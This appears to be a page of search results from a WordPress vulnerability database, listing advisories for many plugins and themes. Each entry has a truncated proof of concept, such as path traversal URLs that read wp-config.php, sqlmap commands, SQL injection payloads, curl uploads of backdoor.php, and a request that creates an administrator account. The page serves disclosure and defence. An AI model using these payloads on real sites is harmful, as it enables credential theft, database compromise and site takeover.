4359 matches found
RobotCPA Plugin V5 - Unauthenticated Local File Inclusion
The robotcpa WordPress plugin was affected by an Unauthenticated Local File Inclusion security vulnerability. This issue has been seen exploited in the wild with the following payload: http://www.example.com/wp-content/plugins/robotcpa/f.php?l=..%2F..%2F..%2Fwp-config.php...
Easy2Map Photos <= 1.0.9 - SQL Injection
The code in Functions.php is vulnerable to SQL Injection because they are not parameterising or sanitising user input. sqlmap -u 'http://www.example.com/wp-admin/admin-ajax.php' --data="mapID=11&mapName='+or+1%3D%3D1%3B&action=e2mimgsavemapname" --cookie=COOKIEHERE --level=5 --risk=3...
Easy2Map <= 1.24 - SQL Injection
The Function.php file uses sprintf to format queries being sent to the database, this doesn't provide proper sanitisation of user input or properly parameterises the query. $ sqlmap -u 'http://www.example.com/wp-admin/admin-ajax.php'...
SE HTML5 Album Audio Player <= 1.1.0 - Local File Include
The se-html5-album-audio-player v1.1.0 plugin for wordpress has a local file include vulnerability. The downloadaudio.php file does not check to see if the user is authenticated, it only attempts to check if the path is in /wp-content/uploads which is easily defeated with ../...
Simple Share Buttons Adder <= 6.0.0 - Reflected Cross-Site Scripting (XSS)
A reflected XSS in "Simple Share Buttons Adder" before version 6.0.1 lead to a reflected cross-site scripting vulnerability on all pages where the "Simple Share Buttons Adder" was added usually all blog posts. Exploitation required that the browser did not encode the parameters sent to the server...
Anti-Malware & Brute-Force Security by ELI <= 4.15.22 - Stored XSS
The Anti-Malware and Brute-Force Security by ELI has two issues which we will cover in this report. The first is that no nonce CSRF token is utilized on the settings screen. This could potentially result in resource utilization by performing a large number of scans simultaneously, should an...
NextScripts: Social Networks Auto-Poster < 3.4.18 - CSRF to Stored XSS
The NextScripts: Social Networks Auto-Poster plugin for WordPress is vulnerable to a Persistent XSS attack on the settings screen, due to a lack of sanitation of user input, and lack of Cross-Site Request Forgery token nonce. If a page with the following FORM in is visited by an administrative...
Simple Photo Gallery 1.7.8 - Blind SQL Injection
MySQL = 5.0.12 AND time-based blind SELECT sql injection in the galleryid parameter. ./sqlmap.py --dbms=MYSQL --technique T -u http://www.example.com/wordpress/index.php/wppgphotogallery/wppgphotodetails/?galleryid=1&imageid=14...
My Calendar <= 2.3.29 - Arbitrary File Override & Reflected XSS
The file override vulnerability allows an admin to override any file on the web server, ignoring settings such as DISALLOWFILEEDIT. Arbitrary File Override ----------------------- POST http://localhost/wordpress/wp-admin/admin.php?page=my-calendar-styles Post Data: wpnonceavalidnonce...
Anti-Malware & Brute-Force Security by ELI <= 4.15.17 - Multiple Reflected XSS
The Anti-Malware Security and Brute-Force Firewall WordPress plugin was affected by a Multiple Reflected XSS security vulnerability. http://localhost/wordpress/wp-admin/admin.php?page=GOTMLS-settings&GOTMLSmsg=xsstestalert1...
Visual Form Builder <= 2.8.2 - SQL Injection & Reflected XSS
The Visual Form Builder WordPress plugin was affected by a SQL Injection & Reflected XSS security vulnerability. SQL Injection ------------- http://www.example.com/wp-admin/admin.php?page=visual-form-builder&form-filter=1+or+1%3D2...
Multiple Plugins - jQuery prettyPhoto DOM Cross-Site Scripting (XSS)
The jQuery prettyPhoto library bundled with many plugins was found to be vulnerable to DOM Cross-Site Scripting XSS. http://www.example.com/prettyPhotogallery/1,/...
Syndication Links <= 1.0.2 - DOM Cross-Site Scripting (XSS)
The Syndication Links WordPress plugin was affected by a DOM Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-content/plugins/syndication-links/genericons/example.html...
Indieweb Post Kinds <= 1.3.1 - DOM Cross-Site Scripting (XSS)
The Post Kinds WordPress plugin was affected by a DOM Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-content/plugins/indieweb-post-kinds/genericons/example.html...
Media File Manager Advanced <= 1.1.5 - Multiple Vulnerabilites
Media File Manager Advanced suffers from executing administrator actions by any authenticated user due to weak permissions checking. An attacker is able to delete/update posts, Creating/Removing/Listing Directories, Moving/Renaming/Deleting Files, Blind SQL Injection and Cross-Site Scripting. Pos...
Auberge Theme <= 1.4.4 - DOM Cross-Site Scripting (XSS)
The Auberge WordPress theme was affected by a DOM Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-content/themes/auberge/genericons/example.html...
Modern Theme <= 1.4.1 - DOM Cross-Site Scripting (XSS)
The Modern WordPress theme was affected by a DOM Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-content/themes/modern/genericons/example.html...
WordPress 4.1-4.2.1 - Unauthenticated Genericons Cross-Site Scripting (XSS)
Description WordPress 4.1.5 and 4.2.2 removes the Genericons example file which came bundled with the twentyfifteen theme which is vulnerable to DOM based Cross-Site Scripting XSS. http://www.example.com/wp-content/themes/twentyfifteen/genericons/example.html1...
Yet Another Related Posts Plugin (YARPP) 4.2.4 - CSRF / XSS / RCE
'Yet Another Related Posts Plugin' options can be updated with no token/nonce protection which an attacker may exploit via tricking website's administrator to enter a malformed page which will change YARPP options, and since some options allow html the attacker is able to inject malformed...
Amazon Product In a Post Plugin - SQL Injection
amazon-product-in-a-post.php - this plugin takes raw user values and uses it delete from the database. This query can be manipulated to perform SQL injection attacks. Line 40: $tempswe = $wpdb-query"DELETE FROM $wpdb-prefixamazoncache WHERE Cacheid ='$wp-queryvars'appip-cache-id'' LIMIT 1;"; sqlm...
Freshmail for WordPress <= 1.5.8 - shortcode.php SQL Injection
There is a SQL Injection vulnerability available for collaborators or higher privileged users for webs with freshmail plugin installed. The SQL Injection is located in the attribute "id" of the inserted shortcode FMform id="N". The shortcode attribute "id" is not sanitized before inserting it in ...
Jetpack <= 3.5.2 - Unauthenticated DOM Cross-Site Scripting (XSS)
Genericons...
Freshmail for WordPress <= 1.5.8 - Unauthenticated SQL Injection
There is a unauthenticated SQL injection vulnerability in the "Subscribe to our newsletter" formularies showed to the web visitors in the POST parameter fmformid. POST /wp-admin/admin-ajax.php HTTP/1.1 Host: X-Requested-With: XMLHttpRequest ... Cookie: wordpressf30...
Facebook Page Photo Gallery <= 2.0.9 - DOM Cross-Site Scripting (XSS)
The facebook-page-photo-gallery WordPress plugin was affected by a DOM Cross-Site Scripting XSS security vulnerability. http://www.example.com/prettyPhotormsg0d/2,/...
Twenty Fifteen Theme <= 1.1 - DOM Cross-Site Scripting (XSS)
Genericons...
WordPress prettyPhoto <= 1.1 - DOM Cross-Site Scripting (XSS)
The WordPress prettyPhoto WordPress plugin was affected by a DOM Cross-Site Scripting XSS security vulnerability. http://www.example.com/prettyPhotogallery/1,/...
Pie Register 2.0.14-2.0.15 - SQL Injection
User input is not validated correctly when accepting an Invitation Code, as such an SQL Injection attack is possible. This attack is triggered when the parameters ‘showdashwidget’ and ‘invitaioncode’ are provided to any page, by any user anonymous or otherwise. import requests,base64,re...
Pie Register 2.0.14-2.0.15 - Privilege Escalation
User input is not validated correctly when accepting a login request via the Pie Register plugin. It is possible to manipulate posted variables in order to login using an arbitrary User ID such as 1, for the default Administrative account. import requests target="http://localhost" payload =...
WeeklyNews Premium Theme <= 2.2 - Cross-Site Scripting (XSS)
Vendor confirmed fixed in as 2.2.9 although this issue was not mentioned in the changelog. http://www.example.com/?s=test"...
White Label CMS <= 1.5.2 - Stored XSS
Due to a lack of CSRF protection, and lack of sanitation of user input, it is possible to trigger a Persistent XSS attack via a CSRF attack. This attack targets in particular the Import functionality, which is located in the 'wlcmsImport' function, within the file...
rtMedia for WordPress, BuddyPress & bbPress 3.7.39 - SQL Injection
When initialized, the rtMedia will include and instantiate certain classes if BuddyPress is installed. One of these classes is RTMediaActivityUpgrade, contained within the file ‘app/importers/RTMediaActivityUpgrade.php’. This class is instantiated in the file ‘admin/RTMediaAdmin.php,’ line 110, i...
Exquisite Ultimate Newspaper Theme <= 1.3.3 - DOM Cross-Site Scripting (XSS)
The exquisite-wp WordPress theme was affected by a DOM Cross-Site Scripting XSS security vulnerability. http://www.example.com/...
Premium SEO Pack 1.8.0 - Unauthenicated Arbitrary File Upload & LFD
This plugin is vulnerable to Local File Disclosure and Remote Code Execute via Arbitrary File Upload. BASE64 ENCODED SHELL...
Ultimate Product Catalogue <= 3.1.2 - Unauthenticated SQL Injection
Unauthenticated SQL injection in parameter "SingleProduct" when a web visitor explores a product published by the web administrator. This exploit needs magicquotesgpc turned off in the destination server. File Functions/Shortcodes.php line 779 http:///?SingleProduct=2'+and+'a'='a...
Ultimate Product Catalogue <= 3.1.2 - Unauthenticated SQL Injection
Unauthenticated SQL injection in ajax call when the plugin is counting the times a product is being seen by the web visitors. The vulnerable POST parameter is "ItemID". Vulnerable code: In file Functions/ProcessAjax.php line 67: ... $ItemID = $POST'ItemID'; $Item = $wpdb-getrow"SELECT ItemViews...
Ultimate Product Catalogue <= 3.1.1 - Unauthenticated File Upload
By sending a specially-crafted HTTP POST request, a remote unauthenticated attacker can exploit this issue to upload arbitrary file and execute it in the context of the web server process. curl -v -k -X POST -F "ProductsSpreadsheet=@./backdoor.php"...
Crayon Syntax Highlighter 2.0 - 2.6.10 - Defacement
The Crayon Syntax Highlighter plugin allows access to the AJAX method 'crayon-theme-editor-save' to any registered user. When called, the AJAX method ‘crayon-theme-editor-save’ will call the 'save' function within the CrayonThemeEditorWP class, defined in...
Mashshare <= 2.3.0 - Information Disclosure
The Mashshare plugin exposes a few AJAX commands via its own custom hook, which can be found in the file ‘includes/admin/admin-actions.php’, and the function ‘mashsbprocessactions’. This function is called upon the ‘admininit’ action being fired, which can be triggered by anyone when visiting the...
WP-Mon - Arbitrary File Download
The wp-mon WordPress plugin was affected by an Arbitrary File Download security vulnerability. As seen in access logs: http://www.example.com/wp-content/plugins/wp-mon/assets/download.php?type=octet/stream&path=../../../../&name=wp-config.php...
Ajax Store Locator <= 1.2 - Remote SQL Injection
The ajax-store-locator WordPress plugin was affected by a Remote SQL Injection security vulnerability. http://www.example.com/wordpress/wp-admin/admin-ajax.php?action=sldalsearchlocation&funMethod=SearchStore&Location=Social&StoreLocation=11 AND SELECT FROM SELECTSLEEP10LCKZ...
Crayon Syntax Highlighter <= 2.6.10 - Local File Disclosure
The local file syntax highlighting feature of Crayon Syntax Highlighter doesn't check the path of the file to process. Also, by default, this feature is usable through public comments. This allows unauthenticated visitors to see the content of any file where the web server has read permissions,...
Tune Library <= 1.5.4 - SQL Injection
The Tune Library WordPress plugin was affected by a SQL Injection security vulnerability. http://www.example.com/?pageid=2&artistletter=G' UNION ALL SELECT CONCATWSCHAR59,version,currentuser,database,2--%20...
WP Mobile Edition <= 2.2.7 - Remote File Disclosure
The plugin is not filtering data in GET parameter 'files' in file 'themes/mTheme-Unus/css/css.php' http://www.example.com/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php...
WordPress Video Gallery <= 2.8 - SQL Injection
Note: The vendor patched the issue but did not change the version number. Using fixed in version 2.8.1 for detection reasons although in reality this version does not exist at the time of writing. http://www.example.com/wp-admin/admin-ajax.php?action=googleadsense&vid=SQLi...
N-Media Website Contact Form with File Upload <= 1.3.4 - Arbitrary File Upload
The "uploadfile" ajax function is affected from unrestricted file upload vulnerability. curl -k -X POST -F "action=upload" -F "Filedata=@./backdoor.php" -F "action=nmwebcontactuploadfile" http://www.example.com/wp-admin/admin-ajax.php Response:...
Fusion Engage 1.0.5 - Local File Disclosure
The fusion-engage WordPress plugin was affected by a Local File Disclosure security vulnerability. curl --data "action=fegetsvhtml&video=../wp-config.php" "http://www.example.com/wp-admin/admin-ajax.php";...
Duplicator <= 0.5.14 - SQL Injection & CSRF
An authorised user with "export" permission or a remote unauthenticated attacker could use this vulnerability to execute arbitrary SQL queries on the victim WordPress web site by enticing an authenticated admin CSRF. http://www.example.com/wp-admin/admin-ajax.php?action=duplicatorpackagedelete PO...
All In One WP Security & Firewall <= 3.9.0 - Blind SQL Injection
There are some pages which use the WordPress escsql function incorrectly. http://www.example.com/wp-admin/admin.php?page=aiowpsec&tab=tab3&orderby=userid,select from selectsleep30a&order=asc...
QAEngine Theme - Privilege Escalation
QAEngine vulnerability allows an attacker to have an administrator account on the target's website. http://www.example.com/wp-admin/admin-ajax.php?action=ae-sync-user&method=create&userlogin=xADMIN&userpass=xPASS&role=administrator...
SP Project & Document Manager <= 2.5.3 - Blind SQL Injection
The SP Project & Document Manager WordPress plugin was affected by a Blind SQL Injection security vulnerability. http://www.example.com/wp-content/plugins/sp-client-document-manager/ajax.php?function=thumbnails&pid=SQLi...